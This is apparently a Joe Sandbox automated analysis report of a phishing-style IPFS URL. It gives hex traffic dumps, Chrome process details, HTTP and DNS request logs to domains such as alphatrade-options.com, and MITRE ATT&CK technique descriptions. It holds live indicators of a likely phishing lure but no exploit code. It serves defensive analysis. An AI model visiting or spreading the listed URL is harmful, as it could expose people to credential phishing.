2025-01-16 00:33:01 UTC	16384	IN	Data Raw: 06 15 30 ce 26 fd 80 69 00 09 a4 0c 34 c4 e0 aa 65 80 05 10 2b 22 fe c4 40 5a 12 86 9f 0d 66 3c 28 63 20 c5 d1 9f 01 2a 4f 72 80 13 83 2c 35 12 66 b4 bc 19 a0 75 23 13 37 7d c3 99 d0 20 79 a4 14 2f 45 fc 96 53 c1 c5 cb 19 8f 2a b8 3c 41 ec 8e 05 9b 24 39 34 f2 a0 7a 22 03 f1 7b 64 0c df 28 63 91 00 79 12 09 cc 30 8e 67 c0 08 92 04 66 23 1a d0 5c 63 03 86 81 64 d0 9f 79 82 19 f2 c1 46 23 d0 e7 c7 7d 1a 61 70 88 76 13 29 d0 de 21 31 68 96 10 7a 83 48 60 a1 3f 27 30 65 ff cc 06 13 11 00 60 20 03 7c 95 50 6e 8c 18 00 1e 42 0d 28 a8 c7 63 12 b5 f0 c8 00 17 4c 34 42 20 12 4c 64 42 24 9e 4d 44 d6 1f b7 21 84 61 24 57 9d f8 07 0a 12 ed 58 49 08 12 b1 c5 87 01 8b f5 73 a3 25 03 ac 48 0f 03 2e ce 51 24 45 99 18 60 62 3f 2a ec 51 42 42 2b 64 09 89 00 d8 f8 43 40 81 Data Ascii: 0&i4e+"@Zf<(c Or,5fu#7} y/ES<A$94z"{d(cy0gf#\cdyF#}apv)!1hzH`?'0e` \|PnB(cL4B LdB$MD!a$WXIs%H.Q$E`b?*QBB+dC@
2025-01-16 00:33:01 UTC	16384	IN	Data Raw: 08 bc 00 2e 7e 11 46 07 e8 f9 c2 a6 3a f5 a9 50 8d aa 54 a7 4a d5 aa 5a f5 aa 58 cd aa 56 b7 ca d5 ae 7a f5 ab 60 0d 2b 20 82 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 c8 00 c8 00 85 00 00 00 b5 b5 b5 f5 f5 f5 fd fd fd 9d 9d 9d f7 f7 f7 fb fb fb 99 99 99 9b 9b 9b ff ff ff a1 a1 a1 9f 9f 9f a5 a5 a5 ad ad ad c9 c9 c9 ed ed ed a3 a3 a3 f9 f9 f9 f3 f3 f3 df df df d1 d1 d1 e1 e1 e1 e9 e9 e9 b9 b9 b9 bd bd bd ef ef ef c3 c3 c3 a9 a9 a9 db db db eb eb eb e7 e7 e7 c7 c7 c7 cf cf cf c1 c1 c1 bb bb bb cb cb cb bf bf bf f1 f1 f1 d5 d5 d5 ab ab ab dd dd dd d9 d9 d9 d3 d3 d3 b3 b3 b3 af af af c5 c5 c5 b1 b1 b1 a7 a7 a7 b7 b7 b7 e3 e3 e3 e5 e5 e5 cd cd cd d7 d7 d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 Data Ascii: .~F:PTJZXVz`+ !,
2025-01-16 00:33:01 UTC	6050	IN	Data Raw: d8 d2 28 0d 17 5c 31 0d 0f c0 12 25 97 11 49 47 38 71 93 07 80 40 0b ec 38 86 01 70 80 74 94 4c e1 24 8e 08 4a 69 88 92 94 5c c8 80 0a 2e a0 c7 54 66 82 95 ad c4 86 0b 46 10 03 2e 26 c1 02 2a 10 c1 c4 72 79 00 55 5a 02 97 c4 c4 06 04 5c 10 02 10 a0 c0 03 1d c8 80 00 fc 26 81 0e c4 20 05 14 68 81 16 93 b9 bb 4c 70 80 8c c9 0c a7 60 08 50 b1 4d 74 e0 91 e2 4c e7 57 18 e0 43 4e 08 60 9b ea 8c 27 48 38 38 0a 03 ac 50 9e f8 4c 88 3b 4c 91 82 5a e6 13 9f 56 4c 85 04 06 f7 4f 7c 06 60 89 a8 50 01 38 0b da 4a 02 b0 71 15 59 64 68 3a 57 10 c8 54 a4 60 98 12 4d 23 04 1a 06 0b 3c 2e 34 a3 7c 1b 81 2f 53 51 00 97 81 d4 35 08 bd c5 03 20 78 52 ad b0 80 7b 9a be e8 80 26 5b ba 12 11 84 f0 17 8d c4 28 4d 97 b1 00 07 a4 14 19 03 40 01 41 5b 7a 02 1a 8c b4 17 12 a0 00 2a Data Ascii: (\1%IG8q@8ptL$Ji\.TfF.&ryUZ\& hLp`PMtLWCN`'H88PL;LZVLO\|`P8JqYdh:WT`M#<.4\|/SQ5 xR{&[(M@A[z

Target ID:	0
Start time:	19:32:47
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	19:32:51
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=1988,i,17994503529284284409,1155299332949706755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	19:32:57
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre	HTTP Parser: Iframe src: https://www.YXNkYXNkQGdtYWlsLmNvbQ==
Source: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre	HTTP Parser: Iframe src: https://www.YXNkYXNkQGdtYWlsLmNvbQ==

Source: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre	HTTP Parser: No <meta name="author".. found
Source: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre	HTTP Parser: No <meta name="author".. found

Source: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre	HTTP Parser: No <meta name="copyright".. found
Source: https://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre	HTTP Parser: No <meta name="copyright".. found

Source: global traffic	HTTP traffic detected: GET /ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre HTTP/1.1Host: ipfs.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-2.2.4.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ipfs.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif HTTP/1.1Host: ik.imagekit.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /customviews/image/password_hidden:93edf7d3ceb704be92ee084ecc62c6c8/ HTTP/1.1Host: fac.corp.fortinet.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-2.2.4.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif HTTP/1.1Host: ik.imagekit.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ipfs.io
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: ik.imagekit.io
Source: global traffic	DNS traffic detected: DNS query: fac.corp.fortinet.com
Source: global traffic	DNS traffic detected: DNS query: alphatrade-options.com

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.18
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.18
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token .
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation
Platforms:	Linux, macOS, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\LICENSE

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\sets.json

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5804, Parent PID: 2596

General

Chronological Activities

Windows Analysis Report
http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre